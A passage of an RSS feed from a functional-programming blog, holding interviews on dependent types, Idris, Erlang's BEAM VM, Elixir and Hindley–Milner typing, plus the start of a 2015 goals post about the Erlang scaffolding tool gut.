&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.cis.upenn.edu&#x2F;~bcpierce&#x2F;tapl&#x2F;&quot;&gt;Types and Programming Languages&lt;&#x2F;a&gt; by Benjamin Pierce is a brilliant&lt;br &#x2F;&gt;
resource for understanding both the theory and the practice. It&lt;br &#x2F;&gt;
surprised me by being a very good introduction to types and having&lt;br &#x2F;&gt;
pretty good reference implementations in OCaml for each of the&lt;br &#x2F;&gt;
discussed type systems. Very highly recommended.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Have you tried &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;elm-lang.org&#x2F;&quot;&gt;&lt;strong&gt;Elm&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;? What do you think of &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Functional_reactive_programming&quot;&gt;&lt;strong&gt;FRP&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I think Functional Reactive Programming could be generalised a bit to&lt;br &#x2F;&gt;
just general stream combinator libraries and we could make it as&lt;br &#x2F;&gt;
simple as libraries such as pipes, machines and scalaz-stream. I’d&lt;br &#x2F;&gt;
like to implement one of those libraries in PureScript and try to&lt;br &#x2F;&gt;
write combinators to fill in the gaps for developing user interfaces&lt;br &#x2F;&gt;
to see how close we get to current FRP libraries.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;You recently gave a talk about &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.idris-lang.org&#x2F;&quot;&gt;&lt;strong&gt;Idris&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;, a language with &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Dependent_type&quot;&gt;&lt;strong&gt;dependent types&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;. Could you explain what dependent types are?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;In non-dependently typed languages we have a way of making values&lt;br &#x2F;&gt;
depend upon other values: functions! In dependently typed languages we&lt;br &#x2F;&gt;
have those functions, but also functions which can return types.&lt;&#x2F;p&gt;
&lt;p&gt;Haskell has two completely separate languages: the language of values&lt;br &#x2F;&gt;
and the language of types. Recent versions of GHC give a way of&lt;br &#x2F;&gt;
promoting certain values up to types, but if you want to write a&lt;br &#x2F;&gt;
function over those values, you’ll have to write a version at the&lt;br &#x2F;&gt;
value level and separately at the type level.&lt;&#x2F;p&gt;
&lt;p&gt;Dependent-types remove the separation. If you write a function, you&lt;br &#x2F;&gt;
can reuse it for terms at any level.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are the practical benefits of using a language with dependent types?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Since you can use values in your types, you can specify a lot more.&lt;br &#x2F;&gt;
For example, I can specify that list reversal is an involution, i.e.&lt;br &#x2F;&gt;
reversing twice is the same as not reversing at all:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;reverseInvolution : (xs : List a) -&amp;gt; reverse (reverse xs) = xs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;No need for tests — if I implement a value for that type, I have a&lt;br &#x2F;&gt;
proof for all possible values.&lt;&#x2F;p&gt;
&lt;p&gt;Or we can specify that a sort function will generate a list where each&lt;br &#x2F;&gt;
element is smaller than the next. The implementation of sort will only&lt;br &#x2F;&gt;
compile if we prove that to be true.&lt;&#x2F;p&gt;
&lt;p&gt;We can also do things like metaprogramming, since we know more about&lt;br &#x2F;&gt;
the values which are passed in, we can compute fancy types for things&lt;br &#x2F;&gt;
such as literals.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;From what we have read from your blog you have learnt Coq and Agda. What can code monkeys like us learn from programming languages like Coq and Agda?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I know a tiny amount of Coq and Agda. They teach people what types are&lt;br &#x2F;&gt;
capable of and how they can be used to interactively prove programs&lt;br &#x2F;&gt;
correct. It’ll also show the potential of typed metaprogramming, for&lt;br &#x2F;&gt;
example allowing the type of printf to depend upon the input string or&lt;br &#x2F;&gt;
how it’s possible to write your own statically checked literal&lt;br &#x2F;&gt;
strings.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Have you checked &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;goto.ucsd.edu&#x2F;~rjhala&#x2F;liquid&#x2F;haskell&#x2F;blog&#x2F;about&#x2F;&quot;&gt;&lt;strong&gt;LiquidHaskell&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;? What do you think about refinement types?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I think refinement types are interesting. It’s very exciting to just&lt;br &#x2F;&gt;
be able to add annotations to existing programs and let proof&lt;br &#x2F;&gt;
searching do the rest, but I’d still prefer dependent types, for a&lt;br &#x2F;&gt;
couple of reasons:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;LiquidHaskell can do some dependent looking things but doesn’t have&lt;br &#x2F;&gt;
full pi-types so can’t do as much as real dependent types&lt;&#x2F;li&gt;
&lt;li&gt;We’re relying on an SMT solver to come up with a reasoning for why&lt;br &#x2F;&gt;
something is true, dependent types allow you to create and manipulate&lt;br &#x2F;&gt;
your own justifications — this might be solvable just via tooling,&lt;br &#x2F;&gt;
though&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;&lt;strong&gt;What other languages or technologies are you keeping an eye on that we should check?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Morte&lt;&#x2F;strong&gt; by Gabriel Gonzalez is a brilliant way of talking about&lt;br &#x2F;&gt;
distributable programs. I want to work on Morte to create a database&lt;br &#x2F;&gt;
of super-optimised code, where package management is about functions,&lt;br &#x2F;&gt;
not libraries. Morte has a pretty good introduction &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;hackage.haskell.org&#x2F;package&#x2F;morte-1.2.1&#x2F;docs&#x2F;Morte-Tutorial.html&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;li&gt;
&lt;li&gt;Paul Chiusano’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;unisonweb.org&#x2F;&quot;&gt;&lt;strong&gt;Unison&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt; is an attempt at removing the “list of&lt;br &#x2F;&gt;
characters” problem from programming. It’s also trying to create a&lt;br &#x2F;&gt;
better UX for functional programming.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
</description>
      </item>
      <item>
          <title>Erlang and distributed systems expert gives his views on BEAM languages, Hindley–Milner…</title>
          <pubDate>Sat, 08 Aug 2015 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/eric-merritt-erlang-and-distributed-systems-expert-gives-his-views-on-beam-languages-hindley/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/eric-merritt-erlang-and-distributed-systems-expert-gives-his-views-on-beam-languages-hindley/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/eric-merritt-erlang-and-distributed-systems-expert-gives-his-views-on-beam-languages-hindley/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-Bvd7l2Q-OmEhkVC2qcclJA.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;eric-merritt-erlang-and-distributed-systems-expert-gives-his-views-on-beam-languages-hindley-milner-type-systems-and-new-technologies&quot;&gt;Eric Merritt, Erlang and distributed systems expert, gives his views on BEAM languages, Hindley–Milner type systems and new technologies&lt;&#x2F;h3&gt;
&lt;p&gt;This time, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;this-is-not-a-monad-tutorial&quot;&gt;This is not a Monad tutorial&lt;&#x2F;a&gt; interviewed &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;ericbmerritt&quot;&gt;Eric Merritt&lt;&#x2F;a&gt;, author of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.manning.com&#x2F;logan&#x2F;&quot;&gt;Erlang and OTP in Action&lt;&#x2F;a&gt; and creator of both &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;joxa.org&#x2F;&quot;&gt;Joxa&lt;&#x2F;a&gt; (a small, semantically clean functional Lisp running on the Erlang VM) and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;erlware&#x2F;relx&quot;&gt;relx&lt;&#x2F;a&gt; (the best release creation tool for Erlang).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-XCrgX6wctMhx0GLjNQS9nw.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;In the following weeks we will be talking with Robert Virding, Erlang co-inventor and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lfe.io&#x2F;&quot;&gt;Lisp Flavored Erlang&lt;&#x2F;a&gt; creator; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;puffnfresh&quot;&gt;Brian McKenna&lt;&#x2F;a&gt;, creator of the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;puffnfresh&#x2F;roy&quot;&gt;Roy&lt;&#x2F;a&gt; language; and the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;mirage.io&#x2F;&quot;&gt;MirageOS unikernel&lt;&#x2F;a&gt; dev team. Stay tuned!&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;In the Functional Geekery podcast you stated that the Erlang VM (BEAM) is brilliant. What did it get right that other VMs did not?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.functionalgeekery.com&#x2F;episode-20-eric-b-merritt&#x2F;&quot;&gt;Functional Geekery, Episode 20: Eric B. Merritt&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;BEAM is the only reasonably popular VM that took the language model, in this case Actors, and leveraged that model to make the platform itself more efficient. I find that brilliant. The two major examples of that approach in BEAM are how the Garbage Collector works with the runtime and how IO works.&lt;&#x2F;p&gt;
&lt;p&gt;In many systems, Java included, the Garbage Collector (GC) must examine the entire heap in order to collect all the garbage. There are optimizations to this, like using Generations in a Generational GC, but those optimizations are still just optimizations for walking the entire heap. BEAM takes a different approach, leveraging the actor model on which it is based. That approach basically has the following tenets:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;If a process hasn’t been run, it doesn’t need to be collected&lt;&#x2F;li&gt;
&lt;li&gt;If a process has run, but ended before the next GC run, it doesn’t need&lt;br &#x2F;&gt;
to be collected&lt;&#x2F;li&gt;
&lt;li&gt;If, in the end, the process does need to be collected, only that&lt;br &#x2F;&gt;
single process needs to be stopped while collection occurs&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Those three tenets are one of the primary reasons that Erlang can be a soft real-time system [&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;jlouisramblings.blogspot.com.ar&#x2F;2013&#x2F;01&#x2F;how-erlang-does-scheduling.html&quot;&gt;Erlang has a preemptive scheduler that also plays a big part in this&lt;&#x2F;a&gt;]. The fact that the model subsets the work the GC has to do allows that work to remain small and manageable. It’s an impressive achievement.&lt;&#x2F;p&gt;
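&lt;p&gt;To make the tenets above concrete, here is a small illustrative sketch (ours, not Eric’s): each spawned Erlang process gets its own private heap, which is reclaimed wholesale when the process exits and collected in isolation if the process lives long enough to need it.&lt;&#x2F;p&gt;
&lt;pre&gt;&lt;code&gt;%% Spawn a thousand short-lived processes; each builds a list on its
%% own private heap. A process that exits before the collector ever
%% runs has its whole heap reclaimed at once, and a long-lived process
%% is only ever paused for the collection of its own small heap.
[spawn(fun() -&gt; lists:seq(1, 10000) end) || _ &lt;- lists:seq(1, 1000)].
&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;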
&lt;p&gt;Another big win for the BEAM, and its approach to leveraging Erlang’s Actor model, is IO: it uses low-level, efficient, non-blocking asynchronous IO primitives from the operating system, but presents a comfortable blocking interface to the language layer. Developers using the platform can use human-understandable synchronous IO primitives while gaining all the advantages of asynchronous IO. This, too, is an impressive achievement. I just gave a talk on this topic for the Seattle Scalability Meetup.&lt;&#x2F;p&gt;
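&lt;p&gt;As a hypothetical sketch of what that interface looks like from the language layer, the following code reads as plain blocking IO, while the VM only suspends this one process and drives the socket with non-blocking OS primitives underneath:&lt;&#x2F;p&gt;
&lt;pre&gt;&lt;code&gt;%% Synchronous-looking IO: recv&#x2F;2 appears to block, but only this
%% process is descheduled until data arrives; every other process
%% keeps running.
{ok, Socket} = gen_tcp:connect(&quot;example.com&quot;, 80, [binary, {active, false}]),
ok = gen_tcp:send(Socket, &lt;&lt;&quot;GET &#x2F; HTTP&#x2F;1.0\r\n\r\n&quot;&gt;&gt;),
{ok, Response} = gen_tcp:recv(Socket, 0).
&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;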
&lt;p&gt;&lt;strong&gt;Apart from the Erlang VM (BEAM), what do you think about Erlang as a language?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I think it’s not a bad language. It has the benefit of being both very declarative and very simple. That is a big win in distributed systems, where complexity composes and quickly becomes unmanageable. I tend to prefer languages with an algebraic type system and type inference, and reasonable metaprogramming capabilities. Erlang has neither, and that’s unfortunate. That said, I have implemented a large number of very reliable systems in Erlang and wouldn’t hesitate to do so again.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;You implemented Joxa, a Lisp for the Erlang VM. Why did you do it?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;For a while there I was working on a problem that was best solved via a suite of DSLs. The platform we built for that was based on Erlang and BEAM, but Erlang doesn’t really lend itself to DSLs. So I decided to write Joxa to facilitate DSL development on the BEAM. It just so happens that creating DSLs for problems is a generally good idea and that makes Joxa a decent general purpose language.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is your opinion about LFE (Lisp Flavored Erlang)?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Joxa took a very different direction than LFE, even though LFE predated it by quite some time. When I ran into the problem that caused Joxa to be created, I investigated it rather deeply to see if it would solve the problem. I ran into a few issues while I was investigating it. In general, I found the implementation very hard to follow. It’s not a bad implementation, it’s just so different from the way I think about languages that it confounded me. That made it difficult for me to expand it.&lt;&#x2F;p&gt;
&lt;p&gt;I was also looking for something with simple semantics that I could build other languages on. LFE is, quite literally, Lisp Flavored Erlang. It is Erlang with S-expression based syntax. That’s not a problem unless you are looking for something with much lower level syntax to build upon. Finally, and this really is a nitpick, Macros are interpreted by LFE and that interpreter is very limited. The rest of the language is interpreted by BEAM. Having to remember if something was going to be run inside the macro interpreter or inside of the normal runtime bothered me a lot.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;And what do you think about Elixir?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I think Elixir has brought a lot of people to the Erlang world that wouldn’t have otherwise come over. That is a very good thing and a powerful contribution to the Erlang ecosystem. However, I am not a big fan of Elixir itself. I find the macro system to be a bit inconsistent and I really dislike that Elixir tries to hide immutability. That does make it slightly easier for beginners, but it’s a leaky abstraction. The immutability eventually bleeds through and then you have to think about it. It also introduces additional complexity within bindings in Elixir macros, among other things. It doesn’t help that I have never been a fan of Ruby syntax, and Elixir borrows heavily from that sphere.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What do you think about laziness in programming languages? In which cases do you think it is useful, if any?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I love laziness in concept. I think the idea that computation only occurs when it’s needed is right in line with the trend that has been occurring in functional programming for many decades. The problem that I have with laziness is more pragmatic. It is very easy to create space leaks and, as of this writing, good tools to detect and debug those space leaks don’t yet exist. That makes me very hesitant to use a language that is lazy by default in production. The Haskell guys are working hard to resolve this, and I think they will, but they haven’t yet.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why do you like Hindley–Milner type system? [the type system used in the ML family (Standard ML, Caml, OCaml, F#) and Haskell]&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-TKFIhHLhfGTz5uMBn6NfkQ.png&quot; alt=&quot;&quot; &#x2F;&gt; Image stolen from &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;learnyousomeerlang.com&#x2F;&quot;&gt;http:&#x2F;&#x2F;learnyousomeerlang.com&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Essentially, it’s because I am lazy. Much like resource management, contract management is a slow, manual, painful process. By contract management, I mean verifying that the form of data a function receives is the form of data that it expects. A Hindley-Milner style type system allows me to offload that tedious work to the compiler. Computers are simply better at that kind of tedious work than humans.&lt;&#x2F;p&gt;
&lt;p&gt;A type system like this is just an evolution of our ongoing effort to offload work to the computer. Originally we wrote in machine code; then we moved up to Assembly, which was one step higher. Not long after, we started using higher-level languages like Fortran, Cobol and Lisp. A bit later on we started offloading resource management to the computer as well, in the form of GC. An algebraic type system is just a continuation of that: with it we are offloading contract checking to the computer. Just as with resource management, the contract checking must happen; it’s just that many languages force the human to do it when the compiler can do it much more effectively.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Do you think that it would be possible to create a language with a Hindley Milner type system for the Erlang VM without affecting the power of Erlang semantics?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Not only do I think it’s possible, I have been planning to do it for a while now, time being the limiting factor. The main problem you will run into is the mismatch between the untyped bits of the native Erlang system and the typed bits of the new language. Dialyzer attempts to solve this through Success Typing, but there may be a better way. Something like what &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;roy.brianmckenna.org&#x2F;&quot;&gt;Roy&lt;&#x2F;a&gt; [a programming language that tries to meld JavaScript semantics with some features common in static functional languages] is doing in its type system, or &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;clojure&#x2F;core.typed&quot;&gt;Clojure’s core.typed&lt;&#x2F;a&gt;. I am not sure, but it’s a fun and solvable problem.&lt;&#x2F;p&gt;
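&lt;p&gt;For a flavor of what that mismatch looks like in practice (an illustrative sketch, not from the interview): Dialyzer works from optional contracts such as the &lt;code&gt;-spec&lt;&#x2F;code&gt; below, and infers success typings for the unannotated rest of the system.&lt;&#x2F;p&gt;
&lt;pre&gt;&lt;code&gt;%% An explicit contract for one function; Dialyzer will flag any call
%% that can never succeed, such as area(&quot;two&quot;, 3), without requiring
%% the rest of the codebase to be typed.
-spec area(number(), number()) -&gt; number().
area(Width, Height) -&gt; Width * Height.
&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;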
&lt;p&gt;&lt;strong&gt;Do you think it would be worthwhile adding algebraic data types to the Erlang VM? Or is using records (Erlang, Joxa) and tagged maps (Elixir) enough for all practical purposes?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Type systems have very little to do with the VM and very much to do with the language. That is, it’s usually a compile time thing rather than a runtime thing. It might actually be useful to add, simply so that BEAM can take advantage of the type annotations to run more optimized versions of the code, but it’s not especially helpful to the efforts to run a well typed language on top of the VM.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;In the past we had to create a few clients and console applications. Python and Ruby were great for building them quickly. However, not being able to easily generate standalone binaries for each OS and architecture is a shortcoming of those languages. We are testing Nim and Go since they have good cross-compilation and library support. Have you tried them? Could OCaml be a good alternative?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I have not tried either Nim or Go, unfortunately. I have used Python extensively and Ruby as well, though to a lesser extent. I have also used OCaml extensively for this type of work, and I find that I like OCaml the best. I like it for all the reasons I talked about above. That said, it is very different from other shell programming approaches and takes a bit of getting used to. I should also note that the vast majority of my work with OCaml has been in conjunction with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;janestreet.github.io&#x2F;&quot;&gt;Jane Street Capital’s Core and Async libraries&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What other languages or technologies are you keeping an eye on that we should check?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I haven’t seen any new languages pop up recently that have grabbed my interest. On technologies, I think that unikernels are very, very interesting. Things like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;osv.io&#x2F;&quot;&gt;OSv&lt;&#x2F;a&gt; for the JVM-based languages, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;mirage.io&#x2F;&quot;&gt;Mirage&lt;&#x2F;a&gt; for OCaml and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;rumpkernel.org&#x2F;&quot;&gt;BSD Rump Kernels&lt;&#x2F;a&gt; for the rest. I think those are going to become the fundamental building block of &lt;strong&gt;system orchestration&lt;&#x2F;strong&gt; in the very near future. The other thing to keep an eye on is the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;nixos.org&#x2F;nix&#x2F;&quot;&gt;Nix Package manager&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;nixos.org&#x2F;&quot;&gt;NixOS&lt;&#x2F;a&gt;, and technologies like Atlas from HashiCorp. It’s not going to be too much longer before we declaratively describe our systems as well as our code. I am looking forward to that.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>The eleventh year: what to do after having taught yourself programming in ten years</title>
          <pubDate>Sun, 11 Jan 2015 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/the-eleventh-year-what-to-do-after-having-taught-yourself-programming-in-ten-years/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/the-eleventh-year-what-to-do-after-having-taught-yourself-programming-in-ten-years/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/the-eleventh-year-what-to-do-after-having-taught-yourself-programming-in-ten-years/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;2025&#x2F;12&#x2F;1-ITiI4UpZDr3uVhpAqtmzIw.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;You have followed the “&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;norvig.com&#x2F;21-days.html&quot;&gt;Teach Yourself Programming in Ten Years&lt;&#x2F;a&gt;” advice. Now what?&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-oNMoLW1PYnEIcHQaHkDD_w.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;strong&gt;“when you don’t create things, you become defined by your tastes rather than ability. your tastes only narrow &amp;amp; exclude people. so create.” ― Why The Lucky Stiff&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Christmas and New Year’s Eve have passed. Now you are a few kilograms fatter. You have spent the last few days reading Hacker News and Reddit and playing League of Legends or GTA V on the PS4. Finally, even if you will never accomplish all of them, you know that it is time to write down your goals for the new year.&lt;&#x2F;p&gt;
&lt;p&gt;After working for more than a decade in IT as a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;blog.codinghorror.com&#x2F;vampires-programmers-versus-werewolves-sysadmins&#x2F;&quot;&gt;programmer and sysadmin&lt;&#x2F;a&gt;, I know that I am nothing more than an &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.paulgraham.com&#x2F;avg.html&quot;&gt;average&lt;&#x2F;a&gt; developer or &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;zedshaw.com&#x2F;archive&#x2F;the-master-the-expert-the-programmer&#x2F;&quot;&gt;novice&lt;&#x2F;a&gt; that knows a little bit of many things. After developing for quite some time in C, C++, Ruby, Python and JavaScript, I wanted to move on to something else. I was bored. Thankfully, working with Erlang for a year and a half introduced me to the amazing world of functional programming, distributed systems, parallelism and concurrency, and there is no way of going back. &lt;a href=&quot;&#x2F;languages-i-want-to-learn-and-use-this-2014&#x2F;&quot;&gt;Erlang also led me to the Haskell and Lisp&#x2F;Clojure&lt;&#x2F;a&gt; world. I found Haskell, with its awesome &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;book.realworldhaskell.org&#x2F;read&#x2F;using-parsec.html&quot;&gt;Parsec&lt;&#x2F;a&gt; parser combinator library, at the bottom of the rabbit hole of compilers and programming language design. Finally, Lisp was the selling point that made me migrate from vim to emacs.&lt;&#x2F;p&gt;
&lt;p&gt;In this post I try to share my goals for this year, so that I can check them next year to measure the outcome of 2015. I really hope that you can find an interesting link, or at least that it encourages you to write your 2015 goals so that next year you can check how much progress you have made!&lt;&#x2F;p&gt;
&lt;h3 id=&quot;cleaning-up-my-closet&quot;&gt;&lt;strong&gt;Cleaning up my closet&lt;&#x2F;strong&gt;&lt;&#x2F;h3&gt;
&lt;h4 id=&quot;gut&quot;&gt;gut&lt;&#x2F;h4&gt;
&lt;p&gt;First of all I need to finish my project &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;unbalancedparentheses&#x2F;gut&quot;&gt;gut&lt;&#x2F;a&gt; (pronounced ‘goot’, short for ‘gutenberg’). gut is a template printing, aka scaffolding, tool for Erlang. It is like rails generate or yeoman. I created it because in my last job I did something that most Erlang developers that I know don’t do very often: creating projects from scratch. Erlang applications have many setup files: rebar.config, Makefile, erlang.mk, project.app.src, rel&#x2F;sys.config, config&#x2F;vm.args and typically a project_app.erl and project_sup.erl. Creating these every time you start a project for a new customer is pretty boring, and overwhelming if you are a newcomer. So I created gut, a tool that uses project generators to instantiate a new project. Generators can be created by any user, and I do not need to add them to gut: anybody can use them since gut fetches them from GitHub.&lt;&#x2F;p&gt;
&lt;p&gt;rebar3, the latest Erlang build tool, has a similar concept called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.rebar3.org&#x2F;v1.0&#x2F;docs&#x2F;using-templates&quot;&gt;template&lt;&#x2F;a&gt;. I was not aware of this when I created gut. I will try to change gut so that gut generators are fully compatible with rebar3 templates. In some way, rebar3 templates solve the same problem that gut does. However, gut can automatically download on demand any generator&#x2F;template available in github to instantiate a new project.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;tinyerl&quot;&gt;tinyerl&lt;&#x2F;h4&gt;
